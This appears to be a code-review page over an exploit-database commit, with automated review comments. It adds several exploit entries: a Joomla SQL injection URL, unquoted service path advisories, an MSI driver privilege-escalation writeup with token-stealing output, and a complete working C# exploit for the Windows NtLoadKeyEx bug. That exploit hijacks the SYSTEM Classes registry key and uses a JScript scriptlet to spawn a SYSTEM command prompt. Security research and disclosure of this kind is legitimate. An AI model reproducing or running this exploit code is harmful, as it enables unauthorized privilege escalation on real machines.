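Review bot: The title attributes the RCE to "elFinder 2.0", but the form and the header comment exercise `/themes/dashboard/assets/plugins/jquery-file-upload/server/php/`, the bundled example handler of a different component; the header should name the component actually hit so an operator knows which shipped plugin to remove or restrict. The comment block would also benefit from one line recording why the request needs no session (it only states "Unauthenticated"), since that is the property a fix has to change. The `action` is hardcoded to `http://localhost/`, which is fine for a PoC but worth a comment such as `<!-- replace localhost with the host under test -->` so the file is not mistaken for a broken one.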

23
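--- /dev/null
+++ b/platforms/php/webapps/40423.txt
@@ -0,0 +1,23 @@
+######################
+# Exploit Title : Joomla Event Booking Component - SQL Injection
+# Exploit Author : Persian Hack Team
+# Homepage : http://persian-team.ir
+# Vendor Homepage : http://extensions.joomla.org/extension/event-booking
+# Category [ Webapps ]
+# Tested on [ Win ]
+# Version : 2.10.1
+# Date 2016/09/25
+######################
+#
+# PoC
+# => Sql Injection :
+# Date Parameter Vulnerable To SQL
+# Demo :
+# http://server/index.php?option=com_eventbooking&view=calendar&layout=weekly&date={SQL}&Itemid=354
+#
+# Video : http://persian-team.ir/showthread.php?tid=160&pid=291
+######################
+# Discovered by : Mojtaba MobhaM
+# B3li3v3 M3 I will n3v3r St0p
+# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
+######################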


@ -5,7 +5,7 @@
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com #
# http://www.fuzzysecurity.com/exploits/8.html #
# OS: WinXP PRO SP3 #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ #
# Software: https://www.exploit-db.com/apps/ #
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #
# #
# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ #


@ -5,8 +5,8 @@
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Windows XP SP1 #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/ #
# applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe #
# Software: https://www.exploit-db.com/apps/ #
# decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows #
# requires you to take a step back and roll with the punches not unlike #


@ -2,7 +2,7 @@
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Software Link: https://www.exploit-db.com/apps/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465


@ -0,0 +1,43 @@
# Exploit Title: NetDrive 2.6.12 Unquoted Service Path Elevation of Privilege
# Date: 24/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.netdrive.net/
# Software Link: http://www.netdrive.net/download
# Version: 2.6.12
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
NetDrive installs a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc Netdrive2_Service_Netdrive2
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Netdrive2_Service_Netdrive2
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NetDrive2\nd2svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NetDrive2_Service_NetDrive2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
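Review bot: The "3. Exploit" paragraph asserts a local user could place code in the system root path, but the only evidence shown is `BINARY_PATH_NAME : C:\Program Files\NetDrive2\nd2svc.exe`, and for that path the unquoted-path lookup resolves under `C:\` and `C:\Program Files`, which by default are not writable by non-administrators on Windows 7; no directory ACL output is given, so exploitability is asserted rather than demonstrated. The Macro Expert section later in this commit includes `cacls` output to establish a writable directory; this advisory and the Elantech Smart-Pad one that follows it (`C:\Program Files\Elantech\ETDService.exe`) would be stronger with the same evidence, or with an explicit sentence such as "exploitation requires a non-default writable ACL on C:\ or C:\Program Files". The remediation a defender wants, quoting the ImagePath in the service registration, is also not stated. This section's file-path header is missing from the rendered page, so the target filename cannot be confirmed from here.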


@ -0,0 +1,27 @@
# Exploit Title: Elantech Smart-Pad Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://www.emc.com.tw/eng/
# Version: 11.9.0.0
# Tested on: Windows 7 64bit
====Description====
Elantech Smart-Pad Service lacks of quotes in the filepath, causing it to be a potential vector of privilege escalation attack.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
====Proof-of-Concept====
C:\>sc qc ETDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ETDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Elantech\ETDService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Elan Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


@ -0,0 +1,93 @@
#Exploit Title: MSI NTIOLib.sys, WinIO.sys local privilege escalation
#Date: 2016-09-26
#Exploit Author: ReWolf
#Vendor Homepage: http://www.msi.com
#Version: too many
#Tested on: Windows 10 x64 (TH2, RS1)
Full description: http://blog.rewolf.pl/blog/?p=1630
Exploit github repo: https://github.com/rwfpl/rewolf-msi-exploit
EDB PoC Mirror:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40426.zip
NTIOLib.sys is installed with a few different MSI utilities that are part of the software package for MSI motherboards and graphic cards. WinIO.sys is completely different driver and is installed with Dragon Gaming Center application, which is part of the software package for MSI notebooks. Since both drivers expose physical memory access to the unprivileged users, I decided to put it into one report (Ill describe the technical differences later). Actually when I was verifying list of affected software, Ive found third driver that is doing exactly the same thing, just have a bit different interface and name (RTCore32.sys / RTCore64.sys).
Affected software:
NTIOLib.sys / NTIOLib_X64.sys
MSI FastBoot
MSI Command Center
MSI Live Update
MSI Gaming APP
MSI Super Charger
MSI Dragon Center
WinIO.sys / WinIO64.sys
MSI Dragon Gaming Center
MSI Dragon Center
RTCore32.sys / RTCore64.sys
MSI Afterburner
NTIOLib functionality exposed through IOCTLs:
read/write physical memory (using MmMapIoSpace)
read write MSR registers (using rdmsr/wrmsr opcodes)
read PMC register (using rdpmc opcode)
in/out port operations
HalGetBusDataByOffset / HalSetBusDataByOffset
WinIO functionality exposed through IOCTLs:
read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”)
in/out port operations
RTCore functionality exposed through IOCTLs:
read/write physical memory (ZwMapViewOfSection of “\\Device\\PhysicalMemory”)
read write MSR registers (using rdmsr/wrmsr opcodes)
in/out port operations
HalGetBusDataByOffset / HalSetBusDataByOffset
It appears that RTCore driver is kind of hybrid between NTIOLib and WinIO. Its also worth noting that WinIO driver is just compiled (and signed by MSI) version of the code that can be found here: http://www.internals.com/utilities_main.htm.
UPDATE: RTCore driver is part of RivaTuner software, so all OEM branded RivaTuner clones are vulnerable (https://twitter.com/equilibriumuk/status/780367990160326656).
Some of the mentioned applications load vulnerable driver on demand, but some of them loads the driver with service startup and keeps it loaded for the whole time, thus exploitation is rather trivial. I havent thoroughly inspected all MSI applications, since its not really possible (different version of the software for different hardware, multiple installers etc), so its very probable that my list doesnt cover all cases. Generally if someone owns any MSI hardware, its good to check if any of above drivers (or with similar name) is loaded, and if yes, just remove the application that installed it.
Disclosure timeline:
30.05.2016 sent e-mail notification to the addresses: security@msi.com, secure@msi.com, bugs@msi.com (none of those is valid, but it was worth trying)
31.05.2016 03.06.2016 tried reporting through official support channel, without any luck, final reply:
Please dont worry about it and the software files are secure.Anyway,we will send the information to relative department.Thanks!
03.06.2016 tried contact through a friend from security team of some super-secret big corporation also without luck
26.09.2016 full disclosure
Technical details & PoC
After ASMMAP disclosure, Ive read that the exploitation of this kind of vulnerability is rather easy:
This can be done by scanning for EPROCESS structures within memory and identifying one, then jumping through the linked list to find your target process and a known SYSTEM process (e.g. lsass), then duplicating the Token field across to elevate your process. This part isnt really that novel or interesting, so I wont go into it here.
Since I dont have much experience in this area, I decided to try above method and see if the exploitation is really straightforward. Ive started randomly poking with physical pages, just to see how it behaves. My first observation was, that the WinIO driver is a lot more stable than NTIOLib, it probably stems from the method that is used to expose physical memory to the user application (MmMapIoSpace vs ZwMapViewOfSection). NTIOLib tends to BSODs sometimes, especially if the accessed addresses are random (aligned to the 0x1000). My second observation was, that NTIOLib becomes quite stable if the memory is accessed sequentially (page by page). This is actually good, because EPROCESS search is sequential activity.
EPROCESS structures are allocated with Proc pool tag, this is the first indicator that EPROCESS search algorithm will look for. Each memory chunk starts with POOL_HEADER structure, followed by a few OBJECT_HEADER_xxx_INFO structures and finally by the OBJECT_HEADER. OBJECT_HEADER.Body is the actual EPROCESS. More details can be found in Uninformed Journal or in WRK (ObpAllocateObject, \wrk\base\ntos\ob\obcreate.c). On Windows 10 x64 (TH2, RS1) all those structures sums up to 0x80 bytes. To successfully execute local privilege escalation, I need to locate EPROCESS structure of 2 processes. One will be some system process and the second should be the process that privileges are supposed to be escalated. For system process I chose wininit.exe, and the escalated process will be the current process. Having names and PIDs of chosen processes, exploit can proceed to final EPROCESS verification (checks of UniqueProcessId and ImageFileName fields).
With above information it is possible to test initial exploit it is very slow, so slow that I havent wait till it finish. The slowdown comes from accessing addresses that are reserved for hardware IO devices. Those reserved memory ranges will vary from one machine to another, so its required to find them out and skip during EPROCESS search. The easiest method to get those ranges is calling NtQuerySystemInformation with SuperfetchInformationClass (http://www.alex-ionescu.com/?p=51), however this call requires elevation, so it has no use in this case. Second place where this information can be obtained is WMI (CIMV2, Win32_DeviceMemoryAddress). This method is not as accurate as SuperfetchInformationClass, but I decided to use it in my PoC. Information returned on VMware test system were 100% accurate, and the slowdown disappeared, however I was still experiencing slowdown on my host machine. I come up with really simple and ugly solution: Ive added hardcoded <0xF0000000-0xFFFFFFFF> region to the ranges returned from WMI. At this point PoC successfully runs on both VMware test machine (Win10 x64 TH2) and my host machine (Win10 x64 RS1):
Whoami: secret\user
Found wininit.exe PID: 000002D8
Looking for wininit.exe EPROCESS...
EPROCESS: wininit.exe, token: FFFF8A06105A006B, PID: 2D8
Stealing token...
Stolen token: FFFF8A06105A006B
Looking for MsiExploit.exe EPROCESS...
EPROCESS: MsiExploit.exe, token: FFFF8A0642E3B957, PID: CAA8
Reusing token...
Whoami: nt authority\system
Over-engineered version of PoC can be found on github (Visual Studio 2015 recommended):
https://github.com/rwfpl/rewolf-msi-exploit
It has hard-coded EPROCESS field offsets, so it only works on Win10 x64 TH2/RS1. PoC should work with any version of NTIOLib and WinIO drivers. I havent fully analyzed RTCore interface due to the fact, that I found it just today, so obviously it is not included in PoC.
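Review bot: `#Version: too many` leaves the affected-version field effectively empty, while the body names the driver files (NTIOLib.sys/NTIOLib_X64.sys, WinIO.sys/WinIO64.sys, RTCore32.sys/RTCore64.sys) and says the PoC "should work with any version of NTIOLib and WinIO drivers"; the header should at least say `#Version: all known versions of NTIOLib/WinIO (RTCore not fully analyzed)` so the summary matches the text. Recording the file versions and signing certificate observed on the test systems would also let defenders match loaded-driver inventories against the vulnerable binaries, which is the only mitigation the text offers ("check if any of above drivers ... is loaded" and remove the application). This section's file-path header is missing from the rendered page, so the target filename cannot be confirmed from here.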


@ -0,0 +1,41 @@
# Exploit Title: Iperius Remote 1.7.0 Unquoted Service Path Elevation of Privilege
# Date: 26/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.iperiusremote.com
# Software Link: https://www.iperiusremote.com/download.aspx
# Version: Software Version 1.7.0
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Iperius Remote allows the user to install the application as a service with an unquoted service path running with SYSTEM privileges. It is important to note that the application installs itself as a service in the same location where the setup file in ran from. Provided that the end user initiates the installation from a directory with spaces in it's path, this could allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof
C:\>sc qc IperiusRemotesvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IperiusRemotesvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Random Folder With Spaces\IperiusRemote.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IperiusRemote Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.


@ -0,0 +1,62 @@
# Exploit Title: Macro Expert 4.0 Multiple Elevation of Privilege
# Date: 26/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/download.htm
# Version: Software Version 4.0
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Macro Expert installs as a service with an unquoted service path running with SYSTEM
privileges. This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. Additionally the
default installation path suffers from weak folder permission which an unauthorized user
in the BUILTIN\Users group could take advantage of.
2. Proof
C:\Program Files\GrassSoft>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Macro Expert
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\program files\grasssoft\macro expert\MacroService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Macro Expert
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Program Files\GrassSoft>cacls "Macro Expert"
C:\Program Files\GrassSoft\Macro Expert BUILTIN\Users:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
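Review bot: The "3. Exploit" paragraph is the unquoted-path template text ("system root path") and never mentions the second finding that the `cacls` output establishes: `BUILTIN\Users:(OI)(CI)C` on `C:\Program Files\GrassSoft\Macro Expert`, the directory that holds `MacroService.exe`, which is the more significant of the two weaknesses the title calls "Multiple". The paragraph should describe that finding and the corresponding fixes (quote the ImagePath; remove the Users change ACE from the install directory). In the description, "an unauthorized user in the BUILTIN\Users group" should read "an authorized but non-privileged user", matching the sentence before it, since membership in Users is the authorized case. This section's file-path header is missing from the rendered page, so the target filename cannot be confirmed from here.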

488
platforms/windows/local/40429.cs Executable file

@ -0,0 +1,488 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=865
Windows: NtLoadKeyEx User Hive Attachment Point EoP
Platform: Windows 10 10586 (32/64) and 8.1 Update 2, not tested Windows 7
Class: Elevation of Privilege
Summary:
The NtLoadKeyEx system call allows an unprivileged user to load registry hives outside of the \Registry\A hidden attachment point which can be used to elevate privileges.
Description:
Windows Vista and above support loading per-user registry hives. Normally calling NtLoadKeyEx would require Backup/Restore privileges to do this making it useless for the average user.. However per-user hives are permitted from a normal user. When calling the Win32 API RegLoadAppKey the hive is loaded under \Registry\A which is a hidden attachment key and doesnt provide any obvious benefit from an EoP perspective (especially as the root name is a random GUID). However it turns out that you can load the per-user hive to any attachment point such as \Registry\User or \Registry\Machine. Interestingly this works even as a sandboxed user, so it would be an escape out of EPM/Edge/Bits of Chrome etc.
So how can we exploit this? The simplest way Ive found is to register the hive as the local system "Classes" key. This isnt registered by default, however a quick inspection indicates that local system does indeed refer to this key when trying to access COM registration information. So by putting an appropriate registration in \Registry\User\S-1-5-18_Classes it will be loaded as a local system component and privileged execution is achieved.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it first. It uses the issue with NtLoadKeyEx to map a custom hive over the local systems Classes key. It then registers a type library which is loaded when WinLogon is signaled. I signal WinLogon by locking the screen. It abuses the fact that registered type library paths when passed to LoadTypeLib can be a COM moniker. So I register a COM scriptlet moniker which will be bound when LoadTypeLib parses it, this causes a local scriptlet file to be executed which respawns the original binary to spawn an interactive command prompt. By doing it this way it works on 32 bit and 64 bit without any changes.
Note that it doesnt need to use the Lock Screen, just this was the first technique I found. Many system services are loading data out of the registry hive, it would just be a case of finding something which could be trivially triggered by the application. In any case imo the bug is the behaviour of NtLoadKeyEx, not how I exploit it.
1) Compile the C# source code file.
2) Execute the PoC executable as a normal user.
3) The PoC should lock the screen. Youll need to unlock again (do not log out).
4) If successful a system level command prompt should be available on the users desktop when you unlock.
Expected Result:
You cant create a per-user hive outside of the hidden attachment point.
Observed Result:
Well obviously you can.
*/
using Microsoft.Win32;
using Microsoft.Win32.SafeHandles;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Poc_NtLoadKeyEx_EoP
{
class Program
{
[Flags]
public enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes(string object_name)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = AttributeFlags.None;
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[Flags]
public enum LoadKeyFlags
{
None = 0,
AppKey = 0x10,
Exclusive = 0x20,
Unknown800 = 0x800,
}
[Flags]
public enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
public class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
public static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
[DllImport("ntdll.dll")]
public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags,
IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused);
static string scriptlet_code = @"<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
new ActiveXObject('Wscript.Shell').exec('%CMDLINE%');
]]>
</script>
</component>
</package>
";
public enum TokenInformationClass
{
TokenSessionId = 12
}
[DllImport("ntdll.dll")]
public static extern int NtClose(IntPtr handle);
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
public static extern int NtOpenProcessTokenEx(
IntPtr ProcessHandle,
GenericAccessRights DesiredAccess,
AttributeFlags HandleAttributes,
out IntPtr TokenHandle);
public sealed class SafeKernelObjectHandle
: SafeHandleZeroOrMinusOneIsInvalid
{
public SafeKernelObjectHandle()
: base(true)
{
}
public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
: base(owns_handle)
{
SetHandle(handle);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
NtClose(this.handle);
this.handle = IntPtr.Zero;
return true;
}
return false;
}
}
public enum TokenType
{
Primary = 1,
Impersonation = 2
}
[DllImport("ntdll.dll", CharSet = CharSet.Unicode)]
public static extern int NtDuplicateToken(
IntPtr ExistingTokenHandle,
GenericAccessRights DesiredAccess,
ObjectAttributes ObjectAttributes,
bool EffectiveOnly,
TokenType TokenType,
out IntPtr NewTokenHandle
);
public static SafeKernelObjectHandle DuplicateToken(SafeKernelObjectHandle existing_token)
{
IntPtr new_token;
using (ObjectAttributes obja = new ObjectAttributes(null))
{
StatusToNtException(NtDuplicateToken(existing_token.DangerousGetHandle(),
GenericAccessRights.MaximumAllowed, obja, false, TokenType.Primary, out new_token));
return new SafeKernelObjectHandle(new_token, true);
}
}
public static SafeKernelObjectHandle OpenProcessToken()
{
IntPtr new_token;
StatusToNtException(NtOpenProcessTokenEx(new IntPtr(-1),
GenericAccessRights.MaximumAllowed, AttributeFlags.None, out new_token));
using (SafeKernelObjectHandle ret = new SafeKernelObjectHandle(new_token, true))
{
return DuplicateToken(ret);
}
}
[DllImport("ntdll.dll")]
public static extern int NtSetInformationToken(
SafeKernelObjectHandle TokenHandle,
TokenInformationClass TokenInformationClass,
byte[] TokenInformation,
int TokenInformationLength);
public static void SetTokenSessionId(SafeKernelObjectHandle token, int session_id)
{
byte[] buffer = BitConverter.GetBytes(session_id);
NtSetInformationToken(token, TokenInformationClass.TokenSessionId,
buffer, buffer.Length);
}
static Tuple<EventWaitHandle, EventWaitHandle> GetEvents()
{
EventWaitHandle user_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_user_wait");
EventWaitHandle sys_ev = new EventWaitHandle(false, EventResetMode.AutoReset, @"Global\ntloadkey_event_sys_wait");
return new Tuple<EventWaitHandle, EventWaitHandle>(user_ev, sys_ev);
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
internal struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
enum CreateProcessFlags
{
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_NO_WINDOW = 0x08000000,
CREATE_PROTECTED_PROCESS = 0x00040000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_SEPARATE_WOW_VDM = 0x00000800,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_SUSPENDED = 0x00000004,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
INHERIT_PARENT_AFFINITY = 0x00010000
}
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern bool CreateProcessAsUser(
IntPtr hToken,
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
static void SpawnInteractiveCmd(int sessionid)
{
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
Console.WriteLine("Got Events");
events.Item1.Set();
events.Item2.WaitOne();
SafeKernelObjectHandle token = OpenProcessToken();
SetTokenSessionId(token, sessionid);
STARTUPINFO startInfo = new STARTUPINFO();
startInfo.cb = Marshal.SizeOf(startInfo);
PROCESS_INFORMATION procInfo;
CreateProcessAsUser(token.DangerousGetHandle(), null, "cmd.exe",
IntPtr.Zero, IntPtr.Zero, false, CreateProcessFlags.CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref startInfo, out procInfo);
}
[DllImport("user32.dll")]
static extern bool LockWorkStation();
static void DoExploit()
{
Console.WriteLine("{0}", Assembly.GetCallingAssembly().Location);
Tuple<EventWaitHandle, EventWaitHandle> events = GetEvents();
string cmdline = String.Format(@"""{0}"" {1}",
Assembly.GetCallingAssembly().Location.Replace('\\', '/'), Process.GetCurrentProcess().SessionId);
string scriptlet_path = Path.GetFullPath("dummy.sct");
File.WriteAllText(scriptlet_path, scriptlet_code.Replace("%CMDLINE%", cmdline), Encoding.ASCII);
Console.WriteLine("{0}", scriptlet_path);
string scriptlet_url = "script:" + new Uri(scriptlet_path).AbsoluteUri;
Console.WriteLine("{0}", scriptlet_url);
string reg_name = @"\Registry\User\S-1-5-18_Classes";
string path = @"\??\" + Path.GetFullPath("dummy.hiv");
File.Delete("dummy.hiv");
ObjectAttributes KeyName = new ObjectAttributes(reg_name);
ObjectAttributes FileName = new ObjectAttributes(path);
SafeRegistryHandle keyHandle;
StatusToNtException(NtLoadKeyEx(KeyName,
FileName, LoadKeyFlags.AppKey, IntPtr.Zero,
IntPtr.Zero, GenericAccessRights.GenericAll, out keyHandle, 0));
RegistryKey key = RegistryKey.FromHandle(keyHandle);
RegistryKey typelib_key = key.CreateSubKey("TypeLib").CreateSubKey("{D597DEED-5B9F-11D1-8DD2-00AA004ABD5E}").CreateSubKey("2.0").CreateSubKey("0");
typelib_key.CreateSubKey("win32").SetValue(null, scriptlet_url);
typelib_key.CreateSubKey("win64").SetValue(null, scriptlet_url);
Console.WriteLine("Handle: {0} - Key {1} - Path {2}", keyHandle.DangerousGetHandle(), reg_name, path);
Console.WriteLine("Lock screen and re-login.");
LockWorkStation();
events.Item1.WaitOne();
typelib_key.DeleteSubKey("win32");
typelib_key.DeleteSubKey("win64");
File.Delete(scriptlet_path);
typelib_key.Close();
key.Close();
events.Item2.Set();
}
static void Main(string[] args)
{
try
{
if (args.Length > 0)
{
SpawnInteractiveCmd(int.Parse(args[0]));
}
else
{
DoExploit();
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
}
}

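--- a/platforms/windows/local/40430.cs
+++ b/platforms/windows/local/40430.cs
@@ -0,0 +1,286 @@
+/*
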